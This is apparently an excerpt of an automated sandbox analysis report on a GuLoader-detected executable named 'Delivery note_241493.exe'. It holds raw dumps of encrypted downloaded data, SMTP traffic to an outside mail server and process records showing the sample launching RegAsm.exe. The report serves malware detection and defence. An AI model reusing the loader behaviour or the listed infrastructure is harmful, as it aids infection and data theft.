                                        2021-10-13 14:33:05 UTC200INData Raw: c2 d2 3d 04 d9 2f ab 8b 33 59 a7 45 ac 2c ea 9a cc fc f2 b3 07 b9 a8 57 28 a3 23 12 48 90 7c cb a3 eb e0 39 ad e3 64 75 ab 33 00 f6 ec 11 4b 97 ec 52 27 c9 2d 5d 3f 23 0d ca ee 91 3a 28 65 81 5a 14 05 90 d0 f8 d3 de be a5 06 48 e8 ff 16 7a 46 7b c6 37 47 f8 9f cc 14 cc d2 06 26 78 9a 78 34 c0 14 f0 e9 73 b7 ca 78 1e 3c 6c 06 95 4e 49 1a db fb 2b 93 30 3c c2 7e 17 77 62 67 63 0c ab 5a c8 97 f4 88 be 24 01 37 50 f0 c7 f5 fa 81 f6 51 a9 91 a6 86 4d d3 8e 51 d3 45 f5 9a 98 bb b2 4d 20 8c e2 b9 97 15 4e 07 1d 92 f8 8e f3 89 91 64 55 5c 0c 96 5b 96 f7 63 14 d8 ce 11 c1 04 27 fd 72 13 2e 7e fb c6 3a ee 17 57 00 40 aa 44 a7 18 3b 5b 1b c6 5b d7 09 03 58 6c 0b 9c d1 d5 56 ed e2 51 14 8b 81 7b 6e 56 c2 09 f1 1b 21 b9 de 02 c7 0f d4 7e 80 38 64 4a 90 a0 61 91 3e 06
                                        Data Ascii: =/3YE,W(#H|9du3KR'-]?#:(eZHzF{7G&xx4sx<lNI+0<~wbgcZ$7PQMQEM NdU\[c'r.~:W@D;[[XlVQ{nV!~8dJa>
                                        2021-10-13 14:33:05 UTC201INData Raw: 45 e5 19 f5 97 01 41 9c d2 88 74 ee 57 b9 76 96 d5 05 50 5c bc b2 44 07 f5 6a 52 84 f2 71 9e 40 6a f7 6d d7 34 dc 59 e6 42 97 83 b1 2f 0b 5b 25 64 7e 19 60 33 56 4a d4 2a c8 05 0f 9c 62 ed 8f 70 6e 0c df a3 59 05 84 be 37 52 94 24 a3 bd 82 ef ba be 68 10 12 11 11 14 dc 75 e6 79 f6 83 e6 b8 9a de db f0 a9 b5 3c 3a df 70 09 5e c0 2a 86 d5 60 8a a0 4f 74 e2 0e f9 28 67 57 57 cd 1a e4 40 d9 3a 79 73 25 5c 18 31 24 7e 9a 7e 13 56 90 06 47 b8 60 a7 fe 0a bb e8 55 f2 12 2e 9b 70 d0 e1 78 d9 ea 66 68 fd 0e 88 0e fb 06 56 10 21 ca 55 e7 42 7c 0b c5 fa 2b 70 d0 59 99 14 95 67 92 15 c7 45 06 9e 38 7e b6 8a e1 49 3b 67 f8 b8 6e 7d 49 a0 78 60 4d 75 1e 2a cf e2 20 4c 38 0a 16 6b a8 58 cc 5a 56 43 62 db 0f f2 79 2d 28 54 84 2a 73 e8 78 76 78 e6 41 4b ba 75 4a 5c a9 85
                                        Data Ascii: EAtWvP\DjRq@jm4YB/[%d~`3VJ*bpnY7R$huy<:p^*`Ot(gWW@:ys%\1$~~VG`U.pxfhV!UB|+pYgE8~I;gn}Ix`Mu* L8kXZVCby-(T*sxvxAKuJ\
                                        2021-10-13 14:33:05 UTC203INData Raw: 6f cc 50 a0 0c fa c5 a6 75 28 6a c0 a9 cb a7 0c 3b 75 8c 41 28 17 a8 35 66 69 0c 89 95 21 d5 3f 6d a2 57 e4 f2 0f b2 3e 73 4d 33 a4 71 f2 f9 d9 5d eb 24 72 fa 2a cb a6 cc f8 78 fe dd 77 b2 24 99 c9 bf 74 35 c5 02 8a 8f 24 53 bb 4b dc 2b e6 81 fd ac e0 b2 17 8f 82 55 5b 8e 34 0c 74 85 61 c1 8f 82 e9 38 b0 d2 50 01 9f 13 33 bd ed 1a 5b 9b fa 52 39 da 44 75 34 57 1b dd fe 8a 3b 2c 25 b4 2f 29 08 8a c9 f8 90 b3 95 b9 14 4b f3 f0 18 3a 6a 72 e2 28 4b f5 8d b8 3b d1 d3 6b 21 77 9f 74 70 9b 29 84 c8 6e ab c4 16 2d 10 41 0a 96 4a 0d 47 fb e0 37 fa 0c 2e ac 3b 03 71 77 48 45 3c b8 42 e2 a1 f9 be b8 3d 08 37 62 fb d6 d9 ca 88 ef 52 99 bb b7 9e 5a c8 8b 56 bd 45 90 aa a8 8d b0 55 04 88 ff ae 8c 10 49 69 29 fd dc 80 e2 ad b0 65 56 49 1c 9c 7c 8a 98 47 12 b4 e8 2d b5
                                        Data Ascii: oPu(j;uA(5fi!?mW>sM3q]$r*xw$t5$SK+U[4ta8P3[R9Du4W;,%/)K:jr(K;k!wtp)n-AJG7.;qwHE<B=7bRZVEUIi)eVI|G-
                                        2021-10-13 14:33:05 UTC204INData Raw: 0e 01 7c f7 d1 18 93 f4 2f 7e 5e c9 24 b3 30 38 22 ed 94 47 da 67 13 60 18 6e ae 2d 06 03 2f e2 2b ec 82 6e 4b 8b 4f db 16 16 66 ec f8 67 8b 0b 43 0d a1 f5 a6 cc e1 a1 54 2d a3 0d 54 e0 a1 46 8e 74 e0 77 d6 88 78 44 9e a0 a1 78 9a 66 b1 04 d0 df 60 63 6e ff 95 44 77 c6 77 5b 93 a1 56 89 57 7d ff 1f f3 3e c5 76 d1 57 81 94 e2 3c 1c 4a 1b 4d 10 2d 57 22 77 40 cb 2c c2 19 7c 8a 54 ed a2 51 61 12 8d 82 4f 0c 84 a9 26 45 c7 03 b4 ac a0 ee d3 a9 6f 0b 2c 26 1b 26 fa 76 c2 68 f6 e6 d3 ba d6 f2 de ec ab c1 35 1b ab 65 1e 3f ee 42 b3 b0 50 b1 b7 3e 47 eb 12 e2 09 13 66 40 c9 16 90 68 ec 25 79 6b 39 6c 18 06 33 6d 98 0c 74 70 88 3c 6a 9a 51 a7 f0 0d de ec 44 c3 3f 0b a4 63 a2 d3 70 ad dd 71 73 c8 3b 8a 08 df 19 24 1d 3e ca 65 e5 21 73 03 b1 d8 3c 76 e0 62 ed 16 9d
                                        Data Ascii: |/~^$08"Gg`n-/+nKOfgCT-TFtwxDxf`cnDww[VW}>vW<JM-W"w@,|TQaO&Eo,&&vh5e?BP>Gf@h%yk9l3mtp<jQD?cpqs;$>e!s<vb
                                        2021-10-13 14:33:05 UTC205INData Raw: d5 90 95 47 5a a9 47 b0 37 64 6a 51 79 9c 3b ce d7 db 2d fc da 3e 6d cd af d9 e7 7d c7 56 d7 b5 9b 0b b2 8c 7b 9a 8d 32 e7 0b f2 40 4b 9b 7f 45 b4 c5 f3 b6 ed 8e 4c 36 84 54 7d 97 15 7c fd 4d 19 6e d9 6d a7 24 f8 aa 8d 7a 32 44 dc a5 dd 89 08 37 68 83 46 41 0b a3 04 41 43 07 9a 8d 3d de 34 24 9f 7f eb f6 08 a7 17 44 5e 33 a6 64 ef ff d8 33 d9 56 46 f6 34 da ad d5 93 43 f2 d4 6b a3 2e 82 ce d0 7d 23 b1 2e ab 9e 08 7d a8 5a c5 32 fa 83 d2 d9 e7 b8 0e b1 b2 59 4b bf 23 01 6d 83 6d cd 95 eb e1 33 b7 8d 50 01 8c 0e 28 a9 fa 0f 44 91 fc 74 39 da 44 75 34 24 48 f6 e8 99 3b 39 44 96 2e 2e 13 8d d7 9d d9 95 8e 88 20 4d ee e4 01 27 0f 71 c2 24 71 d5 90 ad 20 cd bd 2c 01 6d aa 75 63 86 34 84 dc 7f ad e4 15 2b 34 4b 22 88 48 10 4a ed fd 2a fa 0d 22 b1 4f 01 79 2d 43
                                        Data Ascii: GZG7djQy;->m}V{2@KEL6T}|Mnm$z2D7hFAAC=4$D^3d3VF4Ck.}#.}Z2YK#mm3P(Dt9Du4$H;9D.. M'q$q ,muc4+4K"HJ*"Oy-C
                                        2021-10-13 14:33:05 UTC207INData Raw: 95 cb 08 77 fd 10 3b 76 59 5a 5f 50 85 c2 e2 d0 ab e1 90 02 be 6c af 82 fd cd f7 81 a1 77 96 24 ff b1 61 19 a1 d9 71 6d 2f 32 bb 98 12 c4 d7 74 c1 4b 6a 37 dd 44 31 ff 07 2a aa 16 67 84 85 cc 7a 3e 18 4f f5 f7 15 8e f4 33 0a 0a f5 1a a5 2a 38 3d aa ba 76 d5 74 15 68 10 7f a5 2b 06 1e 2c ed 01 e4 82 71 7e 84 49 ba 3a 07 66 e8 e9 0f a3 00 59 1c d3 b0 8a d3 fc 90 54 2d b8 0d 48 e0 c4 6c e3 5a cd 76 d4 8f 6c 67 9f a6 cc 7e 8b 66 8b 26 b1 ca 60 79 45 bc bd 4c 73 e3 62 4c 84 cf 71 ec 42 6e ee 32 f3 24 da 74 c1 4d 90 e6 ab 0b 3c 50 20 59 11 37 6b 33 04 48 c2 2e f8 27 13 9a 50 f5 b8 7b 6b 31 b0 8e 52 17 e8 b8 26 43 98 13 be ad 8d f6 ba be 68 10 12 00 16 13 f8 50 da 78 ea 92 87 92 ff e9 ea e1 b8 b3 10 06 de 6c 18 3f e8 44 a5 f1 77 bb a0 4e 75 87 3f e8 1c 7a 4b 73
                                        Data Ascii: w;vYZ_Plw$aqm/2tKj7D1*gz>O3*8=vth+,q~I:fYT-HlZvlg~f&`yELsbLqBn2$tM<P Y7k3H.'P{k1R&ChPxl?DwNu?zKs
                                        2021-10-13 14:33:05 UTC208INData Raw: c3 c9 af d0 e4 eb 23 d4 a8 b2 d2 ea 96 1d cd 77 4f 55 b0 71 10 6b f9 36 d0 d0 72 d2 13 05 fb c9 e2 08 9f bd 1b 52 ab ec dc 9f 0c ef 7f 79 8e 35 81 62 fc 5e 3f 4f 95 a2 b6 59 39 18 90 db 78 f5 1b e5 bb 9e 22 7a b3 5d ad 38 6a 45 51 0a ba 39 c2 cd c7 5f e8 d6 25 5c ff cb ee ec 6b c0 40 fc fa a2 07 a6 81 55 85 9d 39 e6 0e e3 5e 77 e3 4e 59 a8 b6 c2 b3 ed 83 54 75 8c 41 70 c8 0f 6b ed 55 09 67 92 76 bc 0d e0 ac 82 7e 70 58 c9 b2 c6 89 10 37 7d 8c 41 28 17 a8 5e 58 65 1b 94 80 3c ce 34 1f 82 16 c5 f0 04 a7 09 72 2e 31 b1 71 c4 c2 d8 29 cb 3a 45 e7 3e dd a1 db dc 6c d0 dd 6a a9 3f 8f a7 fc 61 35 d0 29 ab ae 3e 42 ac 41 d8 30 fd 97 93 cb f6 a3 3c 82 a3 57 41 9e 32 17 7d f1 6f cb 95 dd cd 3c b4 ec 60 1c 8a 1e 46 9f dc 1e 44 91 fc 42 49 c1 5d 45 1f 26 3d c5 e1 97
                                        Data Ascii: #wOUqk6rRy5b^?OY9x"z]8jEQ9_%\k@U9^wNYTuApkUgv~pX7}A(^Xe<4r.1q):E>lj?a5)>BA0<WA2}o<`FDBI]E&=
                                        2021-10-13 14:33:05 UTC209INData Raw: 25 60 e6 81 a1 24 8a 8a 36 17 d6 fa 17 13 27 90 62 9e 60 39 ec 87 70 b2 78 39 d5 c0 6a 04 3c f4 c8 06 92 62 67 1b d9 cb 2b 1b 53 64 0d 1d d5 a2 c4 f5 fc e5 2f 70 2b 21 13 3e a1 e1 ca 8d f1 2b cf f8 be 1a 79 9c 64 65 33 32 3a 3e 26 e8 b8 ec 9b ed 92 eb 6d d3 2f 4a 54 8b a7 91 ec ea 24 f3 74 fd c7 31 79 f2 ae 1c 17 33 45 de ed 45 9f a2 16 b0 16 00 43 97 34 31 a9 6c 41 ec 7a 0e f3 6b 79 7f 4d 75 29 05 71 7d e7 90 50 70 09 a6 63 ca 4e 5a 56 8a e5 97 76 07 f2 dc 6f 9a 1e 4d 86 9f 4f 87 44 89 f5 9c c6 e4 38 ba 7b 61 92 6c 8c 47 cf 64 25 e8 36 f1 c4 a4 94 ea 3e 63 d5 7a a6 45 c1 14 8e 24 09 cc b1 da 00 03 e3 52 19 0a e9 1a c6 f6 1d aa 85 c6 23 3c 2f 34 02 a1 83 cf e9 bd 0d ef 05 0b 90 67 90 52 a9 08 b5 a3 11 f7 62 a2 7d 3e 45 01 62 59 25 44 0c 32 a2 52 af 6c 5c
                                        Data Ascii: %`$6'b`9px9j<bg+Sd/p+!>+yde32:>&m/JT$t1y3EEC41lAzkyMu)q}PpcNZVvoMOD8{alGd%6>czE$R#</4gRb}>EbY%D2Rl\
                                        2021-10-13 14:33:05 UTC210INData Raw: 67 5b 42 7c e1 b8 81 a2 f4 fa d6 69 23 85 96 70 46 66 15 a0 51 20 92 d8 cd 50 b0 af 6c 6d 05 fb 9c 83 e8 55 ed 87 07 c5 b0 64 57 51 33 7b f6 2b 78 32 94 9d 6c f4 43 47 df 35 79 06 36 0a 04 4c ca 2f a3 d8 91 fa df 56 7a 25 30 90 bf 9a 84 ee 9b 26 d8 ed d0 e5 0e a7 f4 39 a1 30 c0 d0 ea d0 c1 2f 52 ff b3 e8 e1 6d 20 6a 68 13 3e f9 07 0c f1 64 25 3d 7a f2 16 e1 96 1c 7a b8 b7 5e a0 64 cf 1e 14 0d 6d 0d 8a aa 46 80 6f 18 69 2e de 28 de 18 67 3c 48 b1 35 a2 7a 78 45 25 68 e8 81 bd 38 98 8e 32 14 d9 f6 05 1a 37 a2 e1 12 7d 3f ea a2 51 b2 79 b9 58 c2 6a 07 3c f1 dd 06 97 7a 68 14 c5 cf 37 1d 44 78 8a 88 d5 ae 44 62 f2 e3 2d 6c 2a 31 67 2b 80 e0 cd 1f ed a3 ce e7 bf 1d 02 19 e9 65 2c 3c bc 9e 22 aa b8 f7 8b 6b 0b e8 79 cf bf 8e f2 86 af 81 8f e2 18 e4 74 11 50 32
                                        Data Ascii: g[B|i#pFfQ PlmUdWQ3{+x2lCG5y6L/Vz%0&90/Rm jh>d%=zz^dmFoi.(g<H5zxE%h827}?QyXj<zh7DxDb-l*1g+e,<"kytP2
                                        2021-10-13 14:33:05 UTC211INData Raw: dd 15 1d e3 ea ef 1c 60 f5 da 5e 32 cf 58 dd d8 e7 9f bf c4 08 79 48 5c 6e f2 a2 17 b6 6b 84 e6 83 d6 9a 9d a9 80 de c4 4e 6c b6 07 64 37 a5 2f c1 b2 11 d6 cd 3b 01 86 60 88 75 14 22 31 bd f7 78 0f b4 4a 11 0f 41 0a 71 46 5c 1a ea 7b 7a 2f f8 44 0e fa 83 c0 8d e5 aa 92 33 9b 51 64 d7 0c a0 82 13 da 88 23 1d ac 43 ea 7e 87 6e 50 72 4e d6 2a 98 77 1e 66 c7 80 4b 0a 81 17 ea 72 e5 62 fc 75 bb 12 4f e8 40 16 ab d9 9d 39 0f 14 95 c8 08 b6 34 c7 1b 6e 3f 02 e8 7c 8b 85 42 21 63 6e 60 02 c8 3b d1 10 2e 2e 0d bf 67 87 05 c8 5a 25 ea 5b 0b 80 65 15 1d ee 3b 23 a8 a4 26 2c c1 ee b4 e7 bb d4 a3 61 ab 22 14 bc f8 f1 19 a9 11 9c 4e 65 0f 32 a4 cf 9b 14 eb 41 72 f8 a3 a2 2d 97 9c 89 44 b5 b5 c7 8b a3 f2 77 cd 02 37 58 d7 0a 05 2a 02 4c a6 bb 11 e1 45 7d 9d b5 97 64 f6
                                        Data Ascii: `^2XyH\nkNld7/;`u"1xJAqF\{z/D3Qd#C~nPrN*wfKrbuO@94n?|B!cn`;..gZ%[e;#&,a"Ne2Ar-Dw7X*LE}d
                                        2021-10-13 14:33:05 UTC212INData Raw: 4f f8 a9 b1 1d 5e ac 53 c0 e4 42 21 4b 93 ae 51 81 e6 8e a2 98 f7 63 c5 d4 b2 85 ef 55 65 17 f0 0f bb f3 00 23 5f ca 83 08 55 fe 72 57 4c 18 7d 3b f8 9b 3a 4e bb 3c 98 eb 55 46 aa 85 f9 5c 53 8a d3 48 c7 98 f9 a3 97 b0 e5 e8 55 6e 3d 8f 9f 7f 5a 12 18 a9 5e 3b 87 7a 7d 50 b0 b3 63 79 17 e0 1a 07 fa 49 8a 89 73 c4 a3 7e 4a 50 2f 69 e8 25 6d 29 8d 9a 4b 7b c7 5a cc 26 6a 06 81 a2 14 21 d8 af 08 c2 a0 fb c5 c8 df 39 00 be a2 94 1b 5d 80 14 ec e2 50 26 16 a2 fc 39 a0 2c fb d1 f0 ca c9 33 ce 74 87 e4 fe 69 29 61 67 9c b7 c6 80 c9 f6 1f a2 a4 79 e1 8a a4 8d 17 fc 2d aa 4c a0 64 cf 0a 14 01 ec 51 98 b8 55 8e f2 a4 7a 20 aa 22 dd 1d 7d b5 08 a0 40 b6 7a 6a 50 21 6e eb 93 23 ed 98 9d b4 d9 c4 f1 39 1d 30 30 f1 92 7c 22 ff b5 f0 2a 6b ab d1 84 44 0b 33 f5 a2 06 fe
                                        Data Ascii: O^SB!KQcUe#_UrWL};:N<UF\SHUn=Z^;z}PcyIs~JP/i%m)K{Z&j!9]P&9,3ti)agy-LdQUz "}@zjP!n#900|"*kD3
                                        2021-10-13 14:33:05 UTC214INData Raw: b7 8b 34 87 0b 36 ba 05 22 f1 c1 cd 0d e9 18 da 6b d5 a4 17 95 10 a0 e8 40 1a b6 1e 22 fc bd 18 ee 2c 2b 98 7f 32 64 b5 03 b9 26 e8 e1 e4 46 7c 22 59 15 63 42 18 45 0c 29 87 58 a6 65 61 fc 3f 99 fb 14 13 73 ea e9 21 7f f5 d1 5e 25 f2 59 d1 dc fe 87 b4 c4 08 6c 45 60 78 68 86 01 34 94 85 f4 06 95 8f 8f 28 10 d8 d3 d2 29 a5 1e 62 31 a5 37 c4 be 06 59 c5 22 09 9a 73 91 67 0f 37 b3 ec 65 8d 05 a1 54 0b 1d 41 13 71 5f 5c 1d f0 7e 76 21 66 e0 05 e6 29 d2 8e 72 a9 0e a9 87 5f f8 8b 04 b0 01 8c d8 9f 82 5c aa 42 e7 60 94 65 44 f0 49 c4 24 0b 02 10 6e d7 f4 5c 85 2e 18 e5 7a f8 61 ef 7e bd 14 47 e2 4c 91 fb d4 80 3f 5f 1d b1 cc 98 79 3b c5 16 6e 24 18 62 71 89 8a 4f 21 6f 73 64 11 ce 3d cc 11 27 36 1e b2 73 95 1f 4d 7d 25 f9 50 1e 8d 70 07 12 ed 33 34 3b bf 32 3f
                                        Data Ascii: 46"k@",+2d&F|"YcBE)Xea?s!^%YlE`xh4()b17Y"sg7eTAq_\~v!f)r_\B`eDI$n\.za~GL?_y;n$bqO!osd='6sM}%Pp34;2?
                                        2021-10-13 14:33:05 UTC215INData Raw: 2f 62 17 b4 39 c1 7e 9c d8 e7 06 56 03 a4 c8 b2 e0 74 43 0f e5 3d 53 11 ce 78 16 17 61 fc e1 4a b8 5f 63 d8 3f 95 8c 78 47 e2 0a 3c d7 94 0b 95 83 a5 dc 33 57 07 0e 07 a0 c6 b6 a0 0e 95 a5 02 ce 50 f3 ba ba 1b 42 30 1d dc 83 5f 38 c3 25 a4 51 81 e0 9d a4 9d df 6b cb c1 3c 34 ff c4 50 0a ec 0d b3 e4 9f 8b 4f 46 08 1e 70 e3 62 54 4c b4 62 2d ea e1 3c 49 ac 31 07 5f 4a 4d b5 8a f6 50 49 16 e5 48 c5 fd ed b9 98 ac 73 c3 c5 0e 3a a1 91 63 d7 36 1c 87 55 26 8b fd c4 5a a3 be 63 61 39 e8 1c 1f f7 43 83 99 06 d1 a9 78 4b 4f 20 48 e1 21 6a 3c 09 16 58 e8 df 1b d0 5f 6a 01 11 96 9f 49 d8 af e9 ca 8e e8 56 0a 68 22 14 1c 13 84 97 f5 94 b6 e4 f2 dc e9 0b b6 7e 89 bf 2c fb d7 f0 c9 d2 33 ce 70 8e e2 eb 61 07 68 68 13 22 e8 8d de e5 05 3e 38 65 f6 05 ec 90 03 7d b6 ad
                                        Data Ascii: /b9~VtC=SxaJ_c?xG<3WPB0_8%Qk<4POFpbTLb-<I1_JMPIHs:c6U&Zca9CxKO H!j<X_jIVh"~,3pahh">8e}
                                        2021-10-13 14:33:05 UTC216INData Raw: bd 7a 6d 75 3f 83 b4 79 e7 95 5a 7e 0a a6 67 39 5d 5d 50 80 f1 06 3b 89 76 4d 7d 1a cb 5b 06 44 41 81 40 88 e3 1c 1b ee 3d aa 7b 73 16 86 8a 67 ce 61 c7 68 d3 f5 e0 a5 9a e2 3b 47 d5 98 26 94 c6 32 89 34 8f 12 b2 fc 1c 13 71 7e c9 1f f3 03 54 de d6 bf 01 1f 39 b4 f2 2d 27 b2 0b 36 ec a6 0f ee 2f 03 92 71 ad 54 a0 0e ac 2b e1 c6 e0 51 71 36 40 29 7f 5c 0f 40 03 2a ac 51 af 63 74 fc 11 9b f6 1d 07 74 d8 f7 37 64 e0 c2 49 3f cd 4c db c4 eb 85 ab 5a 8c 6c 45 5c 77 74 b3 12 b4 06 8f e6 85 c4 19 1c b8 0a 58 d0 d0 e8 ad 02 6d 37 bc a9 40 b4 12 c9 46 bf 07 87 7c 86 6a 90 a4 3b ac 75 ec 1c 3f d6 07 82 dd 09 6c 42 46 0e 74 ff 7f 33 e6 4b 89 ed 13 57 9a 75 39 8a 34 9b 5c f9 67 15 a2 81 1e c5 94 04 08 a0 55 f5 74 92 76 47 f2 e8 c2 2a 80 5e 12 6c d9 95 49 03 87 18 e5
                                        Data Ascii: zmu?yZ~g9]]P;vM}[DA@={sgah;G&24q~T9-'6/qT+Qq6@)\@*Qctt7dI?LZlE\wtXm7@F|j;u?lBFt3KWu94\gUtvG*^lI
                                        2021-10-13 14:33:05 UTC217INData Raw: 4b 6c 11 1a f4 c7 cc d4 a9 20 5e 04 04 20 6b 5f b0 ae b0 3e a6 87 b4 53 11 3e 4b 98 1e ea bf 33 b9 89 4f 8a d8 78 80 d9 68 ac 90 6f 94 30 1c 63 e3 25 51 47 8b ff 86 f2 bf da f2 b1 e1 c6 52 1c 98 26 6e 18 3c c8 c1 73 b4 c0 fd 9b b2 1a 2c 28 a1 fa fc 8b 16 6c 0c 4f 70 c1 72 0c 8a 85 eb 61 a4 a8 56 61 ec 36 89 91 64 db 75 05 20 55 dc 18 95 9e aa 53 a3 76 11 8e 56 2e 20 b6 b3 0e 95 bf 01 cf 44 fe ad b7 1b 78 b6 4f c6 ff 45 b1 50 23 be df 63 fb 81 2d 0a d6 71 50 2a 37 22 e4 54 e4 71 f3 0f a9 eb 8b 87 5a cd 9c 82 4c f7 75 c6 22 af 7f 2a ff 95 3e 41 a4 0d 1a 4f 45 c9 3d 8c ec de ad 07 e1 5d 45 72 e1 b8 80 a2 ed e6 ca 65 38 81 93 70 5a 1e 97 9e 57 0e 94 fa de d2 52 b3 62 44 1b eb 0f 82 18 55 04 4e 16 de ab 65 4f 59 2c 75 66 fe 62 2b 80 88 79 f8 54 51 d3 b8 b5 1e
                                        Data Ascii: Kl ^ k_>S>K3Oxho0c%QGR&n<s,(lOpraVa6du USvV. DxOEP#c-qP*7"TqZLu"*>AOE=]Ere8pZWRbDUNeOY,ufb+yTQ
                                        2021-10-13 14:33:05 UTC219INData Raw: 25 ef f8 be 1d 02 19 fd 65 20 bd 34 1d 22 e6 a4 63 04 e4 80 68 f1 d8 3b cf e3 09 a9 92 00 e8 0c ec 63 98 d4 36 74 cf a9 08 08 ae e4 df fe cc 99 a3 31 b1 18 8c cf bd 2c 36 88 60 5a 68 e7 06 e9 e3 ad 6b ec d0 3a 97 35 71 e2 b9 5d 6f 8b a2 69 fe 5e 48 42 05 6e 16 a9 94 7a 09 7b 08 49 62 0d 66 45 80 56 0a da 01 1e f7 38 b2 71 74 14 81 97 62 d3 60 3f 60 db f6 ee a4 9d e8 2b 42 d7 76 26 84 da 34 90 36 8f 39 b5 e7 04 0a ff de bf 19 86 12 b5 76 e5 b8 34 17 03 bc ec 2e 09 ae 06 23 e4 bd 19 e4 2d 16 86 70 ac 4c aa 0e ac 3f f9 fa ea 5f 79 3f 41 15 7b 7e 04 5a 01 2d b7 5d af 77 61 fc 2c 85 e0 09 12 7d c2 fb 21 66 e0 db 45 25 43 51 d4 d8 e3 90 3e d8 0b 63 4f 49 7a 62 fa 19 95 0e 99 e3 9a d0 87 98 b4 8c d3 c6 55 74 ae 1f 69 31 a5 22 c9 ba 14 db c0 30 10 03 78 9f ff 1a
                                        Data Ascii: %e 4"ch;c6t1,6`Zhk:5q]oi^HBnz{IbfEV8qtb`?`+Bv&469v4.#-pL?_y?A{~Z-]wa,}!fE%CQ>cOIzbUti1"0x
                                        2021-10-13 14:33:05 UTC220INData Raw: 77 e5 a6 b0 af 82 81 8c 4a a7 dc c0 ab a1 f3 64 cd 11 36 55 d7 08 10 38 80 45 a4 b5 1f fc 40 60 98 bc 90 61 eb c4 35 11 d9 95 ac eb 63 88 0d 18 fe 5d f8 62 9b 3b 4b 10 d4 d1 c5 3c 54 7a fc a2 78 b2 7e 91 fe e6 47 19 c6 29 c4 56 0d 04 22 79 df 54 a0 a1 be 5f 8f b3 51 03 be ad 8a 8e 0e b3 33 9a 9b cf ee d2 f8 55 c8 d0 55 92 e7 93 32 0e e3 0f 37 d1 b6 80 df 82 e0 3f 36 e2 31 08 c8 5c 12 ce 21 6c 8a bc 24 c9 63 94 c5 ef 1b 5e 0b ac c0 af e8 7d 5e 06 ed 35 41 10 c6 70 9e 0a 69 f9 e1 48 ba 51 6d f1 38 87 99 6a c6 7a 0b 2e 56 d4 05 1b 96 b7 5d aa 56 15 8f 47 ae c8 b8 bd 00 9d b8 07 c6 4c f6 a7 bf 13 50 21 5d ce ea f7 b0 ca 22 10 5d 8f ee 93 ac 93 d7 63 d0 c6 30 48 6e 45 65 ee f0 08 ae e1 82 8e 5d c4 8d 03 75 42 65 72 ce a9 7f 7e f8 db 3b 16 ae 7b 1a 1f 57 1a a4
                                        Data Ascii: wJd6U8E@`a5c]b;K<Tzx~G)V"yT_Q3UU27?61\!l$c^}^5ApiHQm8jz.V]VGLP!]"]c0HnEe]uBer~;{W
                                        2021-10-13 14:33:05 UTC221INData Raw: 01 3b 5e 1a 81 ed cf 68 e1 fa 53 78 f8 98 7c 6b 47 dc 5d bd 1d 52 a3 c9 07 dc 01 dc 22 e6 6a 70 54 b8 ad 65 f4 19 1a 28 f9 a9 4a 76 22 0f 29 32 ea bd 4e 44 d2 c0 0f 50 16 0f 59 49 e4 90 ad 68 1f 5a aa 9d ef 7a 79 ee 0d 08 57 5b 59 4d 1b e4 bc c2 b9 ca b2 d5 43 ae 5b a9 84 fa c8 f7 f8 d2 09 fb 46 b0 f5 1c 08 a0 d9 6e 6d 66 2f b8 83 73 9c ae 2d 9c 6b 7e 21 d6 5d 53 c4 1b 76 e4 70 0e e1 eb b8 7a 6d 75 3b 85 b4 79 e7 91 5d 7e 0a a6 63 d6 5e 5d 50 84 f7 17 bb 15 72 0d 7d 1a cb 5f 06 46 41 81 44 88 e7 1c 1b ea 3d ba 7b 73 12 89 8a 67 ce 65 37 68 d3 f5 e4 a5 95 e2 3b 43 d5 68 26 94 c4 34 8e 36 89 19 b7 fa 01 02 f1 d2 cc 19 ee 12 d4 76 d0 b8 05 17 31 bc fa 29 07 b3 03 3e e1 a1 05 ec 25 0b 9a 6d b0 51 a8 06 a4 23 e4 e6 e2 5b 79 3e 44 09 7e 5e 05 47 04 2f a7 5a a7
                                        Data Ascii: ;^hSx|kG]R"jpTe(Jv")2NDPYIhZzyW[YMC[Fnmf/s-k~!]Svpzmu;y]~c^]Pr}_FAD={sge7h;Ch&46v1)>%mQ#[y>D~^G/Z


                                        SMTP Packets

                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Oct 13, 2021 16:34:41.350827932 CEST58749769185.111.89.226192.168.11.20220-cpanel32.tarhelypark.hu ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 16:34:41 +0200
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Oct 13, 2021 16:34:41.351372004 CEST49769587192.168.11.20185.111.89.226EHLO 035347
                                        Oct 13, 2021 16:34:41.371068001 CEST58749769185.111.89.226192.168.11.20250-cpanel32.tarhelypark.hu Hello 035347 [102.129.143.96]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPE_CONNECT
                                        250-STARTTLS
                                        250 HELP
                                        Oct 13, 2021 16:34:41.371360064 CEST49769587192.168.11.20185.111.89.226STARTTLS
                                        Oct 13, 2021 16:34:41.392384052 CEST58749769185.111.89.226192.168.11.20220 TLS go ahead

                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: Delivery note_241493.exe PID: 8872 Parent PID: 7248

                                        General

                                        Start time:16:32:23
                                        Start date:13/10/2021
                                        Path:C:\Users\user\Desktop\Delivery note_241493.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Delivery note_241493.exe'
                                        Imagebase:0x400000
                                        File size:98304 bytes
                                        MD5 hash:AE27DCCFF11F1C8E17661269D90148B9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Visual Basic
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1001013711.00000000023A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: RegAsm.exe PID: 1832 Parent PID: 8872

                                        General

                                        Start time:16:32:44
                                        Start date:13/10/2021
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\Delivery note_241493.exe'
                                        Imagebase:0x1a0000
                                        File size:65440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: RegAsm.exe PID: 1660 Parent PID: 8872

                                        General

                                        Start time:16:32:44
                                        Start date:13/10/2021
